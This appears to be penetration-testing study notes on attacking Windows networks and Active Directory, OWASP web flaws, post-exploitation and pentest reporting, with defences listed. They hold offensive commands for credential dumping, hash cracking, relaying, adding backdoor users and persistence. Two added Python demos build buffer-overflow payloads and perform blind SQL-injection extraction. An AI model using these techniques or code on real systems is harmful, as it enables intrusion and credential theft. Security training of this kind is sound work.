Penetration Testing (White)

This document outlines various techniques that can be used to attack Windows systems over SMB including: poisoning LLMNR and NBT-NS to capture NTLMv2 hashes, cracking captured hashes using tools like Hashcat or CrackStation, using tools like Nmap, Nessus, and Responder to perform host discovery and SMB signing checks, dumping SAM hashes to crack offline, and using SMB relay attacks and tools like ntlmrelayx to execute commands and gain interactive shells on remote systems. It recommends disabling LLMNR, requiring network access control, and using strong passwords as defenses.

Uploaded by alex mendoza

Initial Attack Vectors

LLMNR Poisoning
- Responder poisons LLMNR, NBT-NS and DNS/MDNS name requests
- Capturing NTLMv2 hashes: Responder
- Password cracking: Hashcat
- Defences
  - Disable LLMNR and NBT-NS
  - Require Network Access Control
  - Require strong user passwords

SMB Relay Attacks
- Host discovery: Nessus, or the Nmap smb2-security-mode script; look for hosts with SMB signing disabled (or not required)
- Responder: set HTTP = Off and SMB = Off in Responder.conf so the captured authentication goes to the relay instead of being answered by Responder
- ntlmrelayx
  - SAM hashes dump: crack offline (Password Hash Cracker, CrackStation https://crackstation.net/) or Pass-the-Hash
  - Interactive shell: -i, connect to it with Netcat
  - Command execute: -c, e.g. a PowerShell reverse shell (msf web_delivery) or other commands
  - Execute an .exe file: -e, e.g. an msfvenom meterpreter payload
- Defences
  - Enable SMB signing on all devices: completely stops the attack; possible performance issues with file copy
  - Disable NTLM authentication: stops the attack; caveat: Windows falls back to NTLM when Kerberos stops working, so expect breakage where Kerberos fails
  - Account tiering: admins only log in to their own accounts / servers / domain controllers
  - Local admin restriction: no local admin rights prevents lateral movement

Gain Shell Access
- Metasploit (msfconsole): exploit/windows/smb/psexec, exploit/windows/smb/psexec_psh
- psexec.py: noisy, caught by AV
- smbexec.py: less noisy / half-shell
- wmiexec.py: less noisy / half-shell

IPv6 Attacks
- mitm6 + ntlmrelayx: LDAP relay
  - new user creation on the DC
  - info dump (loot folder)
  - delegate access
  - aclpwn restore (undo the ACL changes afterwards)
- Defences
  - Disable IPv6 (possible unwanted side effects); prefer defining block rules instead of allow rules
  - Disable WPAD if not in use
  - Enable LDAP signing and channel binding (usually not enabled)
  - Put admin users into the Protected Users group (prevents impersonation or delegation)

Scanning & Enumeration
- Scanning: Nmap, Netdiscover, arp-scan, Masscan, Nessus
- Enumeration
  - HTTP/HTTPS: Nikto, w3af, Dirbuster, Dirb, Gobuster, source code review, Burp Suite, Davtest (test server upload)
  - SMB: msfconsole smb_version, smbclient, enum4linux (not working properly)
  - SSH: connection attempt (banner, auth methods)
  - FTP: anonymous access, binary mode

Other Attack Vectors and Strategies
- Day begins with
  - Early morning / lunch time: mitm6, get the loot back; an account created on the Domain Controller is an easy win
  - Early morning / lunch time: Responder, looking for hashes. Are they giving us hashes? Are those hashes easy to crack? See how the network responds (easy win). If LLMNR is disabled they might have had a pentest before and might know the common attacks
  - Morning: Nessus scan, Nmap scan; pick up targets / hashes for SMB relay attacks (look for SMB open / signing disabled)
  - Afternoon: relay hashes
- Look at logins: check for default creds, check for vulns
- Sweep the entire network for websites: HTTP_Version (Metasploit); use this if scans are taking too long, less likely to be picked up
- Passback attacks: look for printers, a lot of people don't secure them. The scan-to-computer feature can dump creds in clear text and give you the password of the SMB user; is that user a domain admin on the printer? You might get domain admin off it. Check whether it is using individual user accounts
- Jenkins instances: often wide open
- Search for low hanging fruit; think outside the box; try all possible ways in; enumerate as much as you can; don't just focus on the exploit

Information Gathering (OSINT): Target Validation, Subdomains, Fingerprinting, Data Breaches
- Target validation: WHOIS, nslookup, dnsrecon
- Finding subdomains: Google Fu, dig, Nmap, Sublist3r, Bluto, crt.sh
- Fingerprinting: Nmap, Wappalyzer, WhatWeb, BuiltWith, Netcat
- Data breaches: HaveIBeenPwned, Breach-Parse, WeLeakInfo, scylla.sh
Active Directory: Easy-win Strategy
- Users enumeration
  - nmap --script=smb-enum-users.nse
  - GetADUsers.py -dc-ip 10.10.10.161 htb.local/
  - kerbrute userenum --dc 10.10.222.155 -d spookysec.local usernames.txt -t 100
  - Metasploit auxiliary/gather/kerberos_enumusers
- Kerbrute: brute-force discovery of users, passwords and password spraying
- Exploiting Kerberos: ASREPRoasting with GetNPUsers.py
  - List the users that have the property "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH): GetNPUsers.py -dc-ip 10.10.10.161 htb.local/
  - Get the TGT hash for those users: GetNPUsers.py -request -dc-ip 10.10.10.161 htb.local/
- Crack the hashes: Hashcat, John the Ripper
- Get a shell: Evil-winrm, psexec
- Shares enumeration: smbclient
- crackmapexec: check where you can authenticate
- Elevate privileges
  - Abuse WriteDACL permissions: PowerView, ntlmrelayx
  - Get hashes: NTDS.DIT via secretsdump
  - Pass-the-Hash: psexec, evil-winrm, get a SYSTEM shell

Information Gathering (OSINT): Email Addresses, Breached Credentials, Website Technologies, Social Media, Automation
- Email address gathering: Hunter.io (domain search), bugcrowd.com (identify the target), scylla.sh (email:*bbc.co.uk, email:username*), The Harvester
- Breached credentials: Breach-Parse (https://github.com/hmaverickadams/breach-parse), e.g. ./breach-parse.sh @gmail.com gmail.txt "~/Downloads/BreachCompilation/data"; DEHASHED (https://dehashed.com); leakedsource.ru
- Subdomains: Sublist3r, crt.sh, OWASP Amass, Tomnomnom httprobe
- Identify website technologies: BuiltWith, Wappalyzer, whatweb; information gathering with Burp Suite
- Social media: Google Fu, LinkedIn, Twitter
- Automated recon: nmapAutomator, AutoRecon (https://github.com/Tib3rius/AutoRecon), run.sh script

Post-Compromise Enumeration
- PowerView
- Bloodhound

Post-Compromise Attacks: SAM Dumping
- secretsdump: dump the hashes, LSA secrets dumping (DPAPI_SYSTEM key)
- Metasploit: psexec, then meterpreter hashdump
Common Legal Documents (mostly handled by Sales before you test)
- Mutual Non-Disclosure Agreement (NDA)
- Master Service Agreement (MSA): outlines the responsibilities and performance objectives; Rapid7 MSA example: https://www.rapid7.com/legal/msa/
- Statement of Work (SOW): activities, deliverables, timelines, quotation; others: sample report, recommendation letters etc.
- Rules of Engagement (ROE): covers the specifics of your testing: what we can and can't do, what we can and can't attack (IP addresses), timeframe. Common 'don'ts' unless that is a specific thing the client wants to test: Denial of Service; Social Engineering (often set aside as its own assessment). You cannot start your penetration test until the ROE document is signed.
- We are under a time-limited engagement: it is a snapshot in time, we target what we can in that period, and we are not responsible for anything happening after.

Assessment Overview (guidelines, high level)
- Phases of a pentest: planning, discovery, attack, reporting
- Assessment components: what we are attacking, what type of penetration test it is, findings severity ratings
- Scope: IPs; scope exclusions (e.g. no Denial of Service attacks); client allowances (did the client have to assist us in any way?)

Executive Summary and Report Writing (the findings report comes after you test)
- Executive summary: intended for people with no technical background (C-level executives, CISO, CEO); a quick summary of the vulnerabilities you found and what they could lead to, written so non-technical people will understand
  - Attack summary: what you managed to do (actions)
  - Security strengths: give them kudos where it is deserved (e.g. we were scanning and they identified and blocked us)
  - Security weaknesses, identified at a high level: missing multi-factor authentication, weak password policy, unrestricted logon attempts
  - Vulnerabilities by impact: charts
  - Recommendations
- Technical summary: intended for technical people, shares the technical details
  - Penetration testing exploitation proof of concept: chained exploit of attacks; for each finding: who, vector, action, remediation, features, references
  - Additional reports and scans (informational)
- 'How to' video on writing a pentest report: https://www.youtube.com/watch?v=EOoBAq6z4Zk
- Sample pentest report: https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report
- Legal documentation for physical security testing: https://github.com/trustedsec/physical-docs

Post-Compromise Attacks

Pass Attacks
- Dump the hashes: SAM dump from a shell with Metasploit; secretsdump.py; if the SAM dump is not working, crackmapexec; or just download windows/system32/config/SAM, windows/system32/config/SECURITY and windows/system32/config/SYSTEM and extract the hashes locally with secretsdump.py
- Crack the NTLM hashes: Hashcat; Password Hash Cracker; CrackStation (https://crackstation.net/)
- Pass-the-Password: crackmapexec; Pwn3d! means try to get a shell with psexec; not Pwn3d! means no SMB access
- Pass-the-Hash: crackmapexec with the NTLM hash, no cracking needed; Pwn3d! or a green [+] means try to authenticate with psexec and get a shell; not Pwn3d! means no SMB access. Only NTLM (NT) hashes can be passed; captured NTLMv2 challenge-responses cannot
- Mitigation
  - Limit account re-use: avoid re-using the local admin password, disable the Guest and Administrator accounts, limit who is a local administrator
  - Utilize strong passwords: the longer the better (>14 characters), avoid common words, "I like long sentences"
  - Privilege Access Management (PAM): check sensitive accounts out and in when needed, automatically rotate the password on check out and check in; limits pass attacks because the hash/password is strong and constantly rotated

Token Impersonation
- Dump local SAM hashes: Mimikatz
- Meterpreter: Incognito
- Mitigation: limit user/group token creation permissions, account tiering, local admin restriction

Kerberoasting
- Request a TGT, providing the NTLM hash; receive the TGT encrypted with the krbtgt hash
- Request a TGS for the server (presenting the TGT); receive the TGS encrypted with the server account's hash: GetUserSPNs.py
- Crack the hash offline
- Mitigation: strong passwords, least privilege

GPP / cPassword
- Groups.xml cpassword: decrypt with gpp_decrypt, Invoke-GPP, or the smb_enum_gpp module in Metasploit
- smbclient: prompt off, recurse on, mget * (pull the share down for offline searching)

Mimikatz
- privilege::debug
- sekurlsa::logonpasswords: logged-in accounts (NTLM, wdigest)
- lsadump::sam, lsadump::sam /patch: SAM dump
- lsadump::lsa /patch: LSA dump (SID, NTLM)
- Credential dumping: why do we dump? Usernames and passwords (ntds.dit); crack the passwords offline and report the % we are able to crack, which shows a weak or a strong password policy
- Golden Ticket (persistence)
  - lsadump::lsa /inject /name:krbtgt: pull down the krbtgt account
  - Access any computer: misc::cmd opens a cmd prompt; dir \\THEPUNISHER\c$; PsExec64.exe -accepteula \\THEPUNISHER cmd.exe gives a shell
  - Silver Ticket: stealthier
- Pass-the-Ticket

Active Directory Attack Overview
- Kerberos Ticket Granting Ticket and the Golden Ticket attack
- Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket
- Golden Ticket, Silver Ticket

Wireless Pentesting: Evaluate the Network
- Separation of networks: how well is the network segmented? Guest network: reduced functionality; can it access employees' things / IPs / servers?
- Open networks, hidden networks
- Evaluate what networks are around: walk around; look for rogue devices
Wireless Pentesting: Hacking Process (WPS, WPA2 PSK, WPA2 Enterprise)
- Place the wireless card in monitor mode
- Discover info about the network: BSSID, SSID, channel (channels 1, 6 and 11 are the most used; they do not overlap)
- Select the network and capture data; perform a deauth attack to speed up the process
- Capture the WPA handshake
- Attempt to crack the handshake (strength evaluation): rockyou.txt for weak passwords; many companies use something familiar to them (company name, phone numbers, street address; substitute 1 with i, 0 with O); https://github.com/danielmiessler/SecLists; https://github.com/initstring/passphrase-wordlist; CEWL to create a wordlist from their website

Buffer Overflow
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding bad characters
- Finding the right module
- Generating shellcode / getting root

Exploitation Basics
- Metasploit
- Brute force attacks: Hydra
- Credential stuffing, password spraying

Credentials
- Password dumping: Metasploit Kiwi and Mimikatz: password dumping in memory, hash dumping, golden tickets
- Default creds; common bad password list
- Word list generators: CEWL, Cupp (Common User Passwords Profiler)

Bug Bounty Recon (automated, e.g. ./run.sh tesla.com)
- Finding subdomains: Assetfinder, Amass
- Find alive domains: HTTProbe
- Screenshot websites: GoWitness
- Subdomain takeover: Subjack
- Scraping Wayback data: Waybackurls
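The offset, EIP and bad-character steps of the buffer-overflow list above are mostly arithmetic, shown here as an added example (not code from the page or the course): the same cyclic pattern Metasploit's pattern_create emits, the offset lookup pattern_offset performs on the little-endian EIP value, the bad-character string to send after the overwrite, and the final payload layout. The EIP value 386F4337 and the JMP ESP address 0x625011AF are sample values for the demonstration; spiking and fuzzing against a live service are not reproduced.

```python
# Added example (not from the page or the course): the offset / EIP / bad-char
# arithmetic of the buffer-overflow workflow above, i.e. what
# msf-pattern_create, msf-pattern_offset and the usual bad-char loop compute.
# Assumptions: the EIP value 386F4337 and the JMP ESP address 0x625011AF are
# sample values for the demonstration; spiking/fuzzing against a live service
# is not reproduced here.
import string

PERIOD = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def cyclic_pattern(length: int) -> bytes:
    """Same sequence as Metasploit's pattern_create: Aa0Aa1Aa2...Ab0Ab1..."""
    if length > PERIOD:
        raise ValueError("pattern would repeat; offsets become ambiguous")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip_hex: str) -> int:
    """Offset of the four pattern bytes that landed in EIP. The debugger shows
    EIP as a little-endian dword: 386F4337 means the bytes 37 43 6F 38 ('7Co8')."""
    needle = int(eip_hex, 16).to_bytes(4, "little")
    idx = cyclic_pattern(PERIOD).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in the pattern: EIP not controlled")
    return idx


def badchar_bytes(exclude=(0x00,)) -> bytes:
    """All bytes 0x01..0xFF minus those already found to corrupt the buffer
    (0x00 is always excluded: it terminates C strings). Send this after the
    EIP overwrite and compare the stack in the debugger; repeat until clean."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """offset bytes of filler, the JMP ESP address (little-endian, from a module
    without ASLR/DEP/SafeSEH), a NOP sled, then the bad-char-free shellcode."""
    return b"A" * offset + jmp_esp.to_bytes(4, "little") + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    off = pattern_offset("386F4337")
    print("offset:", off)
    print("badchars:", badchar_bytes((0x00,)).hex())
    print("payload length:", len(build_payload(off, 0x625011AF, b"\xcc" * 4)))
```

When fuzzing crashes the service at a given length, send cyclic_pattern(length) instead of the A's, read EIP from the debugger, and pattern_offset gives the filler size; every byte missing or altered in the badchar_bytes dump goes into exclude for the next round, and the final list is what you hand to msfvenom's -b option.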
Exploitation Basics: Eternal Blue (MS17_010)
- Metasploit smb_ms17_010
- AutoBlue: alternative to Metasploit

Hashes Dumping / Cracking
- smbclient: pull SAM, SECURITY and SYSTEM
- secretsdump
- Crack: John, Hashcat, Password Hash Cracker, CrackStation (https://crackstation.net/)
- Pass-the-Hash: crackmapexec, psexec

Privilege Escalation
- Stealing and manipulating tokens: Metasploit Incognito

Web Applications: OWASP Top Ten
- SQL Injection, including blind SQL injection; defences: parameterized statements, sanitized input
- Broken Authentication: credential stuffing; brute forcing or other automated attacks; weak or well-known passwords; weak or ineffective credential recovery and forgot-password processes (knowledge-based answers); missing or ineffective two-factor authentication; user sessions or authentication tokens: session ID exposed in the URL, session ID not rotated after a successful login, session IDs not properly invalidated on logout or inactivity (session fixation)
- Sensitive Data Exposure: find all directories (dirbuster); navigate all directories in Burp Suite's Response tab; search for 'key', 'keys', 'password', 'passw'; response headers such as HTTP Strict Transport Security (HSTS), check with https://securityheaders.com; nmap --script=ssl-enum-ciphers -p 443 tesla.com
- XML External Entities (XXE): attacking systems that parse XML input; abuse the SYSTEM entity with malicious XML; leads to DoS, local file disclosure, remote code execution, and more
- Broken Access Control: a user gets access somewhere they shouldn't. Are you able to bypass access? Can you access admin areas or other users' areas from an account (unauthenticated, authenticated, admin)? IDOR: Insecure Direct Object Reference
- Security Misconfiguration: default credentials; disclosure of sensitive information; stack traces and error handling (the application should not throw errors); left-behind applications and directories; unnecessary features and default features not in use; out-of-date software; unnecessary open ports, activated accounts; file upload; deprecated interfaces
- Cross-Site Scripting (XSS): reflected and DOM XSS (client-side), stored XSS (server-side); preventing XSS: encoding, filtering, validating, sanitization
- Insecure Deserialization: serialization / deserialization; ysoserial
- Using Components with Known Vulnerabilities: software is vulnerable, unsupported or out of date; no frequent scans for vulnerabilities; no patching, no fix, no update
- Insufficient Logging & Monitoring: have logs and auditable events; track anyone logging into the application; track failed login attempts; monitor whether anyone is attacking your application
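The SQL Injection item above, as an added example (not code from the page or the course): a login check that splices user input into the statement, the same check with a parameterized statement, and a boolean-based blind extraction against the vulnerable one, which is the "blind SQL injection" case where the only signal is whether the login succeeds. The in-memory SQLite table, the user names and the passwords are constructed for the demonstration.

```python
# Added example (not from the page): the SQL Injection item above, shown as a
# login check built by string concatenation next to its parameterized form,
# plus a boolean-based blind extraction against the vulnerable one.
# Assumptions: an in-memory SQLite table with constructed rows stands in for
# the application's database; the user names and passwords are made up.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
               [("admin", "S3cr3tAdm1n"), ("fcastle", "Password1")])  # constructed rows


def login_vulnerable(username: str, password: str) -> bool:
    """Vulnerable: user input is spliced into the statement and parsed as SQL,
    so admin' OR 1=1-- (password irrelevant) logs in as the first user."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    """Hardened: the same query with bound parameters. The quote and the
    comment marker stay inside a string value and never reach the parser."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def blind_extract_password(username: str, max_len: int = 32) -> str:
    """Boolean-based blind SQLi: the only signal is login success/failure, so
    recover the stored password one character at a time with substr()."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            probe = f"{username}' AND substr(password,{pos},1) = char({code})--"
            if login_vulnerable(probe, "irrelevant"):
                recovered += chr(code)
                break
        else:
            break  # no character matched: end of the password
    return recovered


if __name__ == "__main__":
    print("bypass on vulnerable   :", login_vulnerable("admin' OR 1=1--", "wrong"))
    print("bypass on parameterized:", login_parameterized("admin' OR 1=1--", "wrong"))
    print("blind extraction       :", blind_extract_password("admin"))
```

The blind loop issues one request per candidate character, which is why blind injection is slow but still fatal; the parameterized version returns False for every probe because the payload is compared as a literal user name. Storing plaintext passwords, as the constructed table does, is itself the kind of Sensitive Data Exposure listed above and is only there to keep the demonstration short.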

Post-Exploitation

Maintaining Access
- Persistence scripts: run persistence -h; exploit/windows/local/persistence; exploit/windows/local/registry_persistence
- Scheduled tasks: run scheduleme; run schtaskabuse
- Add a user: net user hacker password123 /add

Pivoting
- Map the compromised host's networks: route print, ipconfig, arp -a
- Connect to the target: psexec
- Metasploit: run autoroute -s 169.254.0.0/24; run autoroute -p; proof of concept with use auxiliary/scanner/portscan/tcp
- proxychains
- SSH pivoting

Covering Tracks
- Make the system/network as it was when you entered it
- Remove executables, scripts, and added files
- Remove malware, rootkits, and added user accounts
- Set settings back to their original configuration
